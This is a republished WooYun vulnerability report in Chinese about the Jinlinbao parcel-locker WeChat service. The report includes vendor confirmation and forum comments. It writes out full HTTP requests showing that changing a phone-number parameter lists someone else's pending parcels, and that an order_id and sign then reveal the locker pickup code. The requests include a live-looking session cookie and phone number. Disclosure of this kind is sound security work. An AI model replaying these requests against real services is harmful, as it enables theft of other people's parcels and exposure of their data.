近邻宝可任意开箱领取别人快递（需知道手机号前提）

2017年4月12日07:35:18评论1,426 views字数 222阅读0分44秒阅读模式

摘要

2016-03-31：细节已通知厂商并且等待厂商处理中
2016-03-31：厂商已经确认，细节仅向厂商公开
2016-04-10：细节向核心白帽子及相关领域专家公开
2016-04-20：细节向普通白帽子公开
2016-04-30：细节向实习白帽子公开
2016-05-15：细节向公众公开

漏洞概要关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-191023

漏洞标题：近邻宝可任意开箱领取别人快递（需知道手机号前提）

漏洞作者：路人甲

提交时间： 2016-03-31 16:35

公开时间： 2016-05-15 19:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：用户敏感信息泄漏

2人收藏

漏洞详情

披露状态：

简要描述：

近邻宝可任意领取别人快递，需知道手机号码

详细说明：

近邻宝可以代别人领取快递，只要知道手机号码

在近邻宝微信企业号中，首先绑定手机号码，在左下角“取快递”=>“待取”处抓包

code 区域

POST /weixin/ordinary/customer/get/not/receive/list/ HTTP/1.1
 Accept-Language: zh-CN
 X-Requested-With: XMLHttpRequest
 Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
 Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
 Origin: http://snsbroker.jinlb.cn
 Accept: application/json, text/javascript, */*; q=0.01
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Accept-Encoding: gzip
 Host: snsbroker.jinlb.cn
 Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1
 Content-Length: 24
 
 phone=13521993016&page=1

修改phone参数可以查询该手机号码的未领取的快件（包含order_id,sign参数）,一个order_id对应一个sign参数

利用这两个参数，发送如下请求

code 区域

GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d&ltype=rece HTTP/1.1
 Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
 Accept-Language: zh-CN
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
 Accept-Encoding: gzip
 Host: snsbroker.jinlb.cn
 Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1

有了密码就可以开箱取货了。

漏洞证明：

利用这两个参数，发送如下请求

code 区域

GET /weixin/ordinary/customer/order/detail?order_id=5574445&sign=9c79ae32889e4f8eaed09cc456191e6d&ltype=rece HTTP/1.1
 Referer: http://snsbroker.jinlb.cn/weixin/ordinary/customer/my/receive/
 Accept-Language: zh-CN
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.1; zh-cn; 2013022 Build/HM2013022) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CN
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
 Accept-Encoding: gzip
 Host: snsbroker.jinlb.cn
 Cookie: ltype=not_rece; session_id=9f9881c6a5384e59f25540633c34191eb807cda1

有了密码就可以开箱取货了。

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-03-31 19:15

厂商回复：

感谢。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-31 17:30 | king7 ( 普通白帽子 | Rank:1902 漏洞数:253 | 早知如此绊人心，何如当初莫相识。)

1

这么说我去隔壁女神家修个路由器知道手机号后就可以取走她的跳蛋了？

1# 回复此人
2016-05-15 22:12 | J0e ( 路人 | Rank:24 漏洞数:8 | 心若苍井空似水)

0

这么说我去隔壁女神家修个路由器知道手机号后就可以取走她的跳蛋了？

2# 回复此人
2016-05-16 05:59 | sutdy ( 普通白帽子 | Rank:113 漏洞数:37 | 0.0)

0

为啥要去修，不是直接嗅探到么，会玩

3# 回复此人
2016-05-16 09:24 | 库日天 ( 路人 | Rank:18 漏洞数:9 )

0

这么说我去隔壁女神家修个路由器知道手机号后就可以取走她的跳蛋了？

4# 回复此人

漏洞概要 关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-191023

漏洞标题： 近邻宝可任意开箱领取别人快递（需知道手机号前提）

相关厂商： jinlinbao.com

漏洞作者： 路人甲

提交时间： 2016-03-31 16:35

公开时间： 2016-05-15 19:20

漏洞类型： 敏感信息泄露

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 用户敏感信息泄漏

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(18) 关注此漏洞

漏洞标题：近邻宝可任意开箱领取别人快递（需知道手机号前提）

漏洞作者：路人甲

漏洞类型：敏感信息泄露

危害等级：高

漏洞状态：厂商已经确认

Tags标签：用户敏感信息泄漏

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分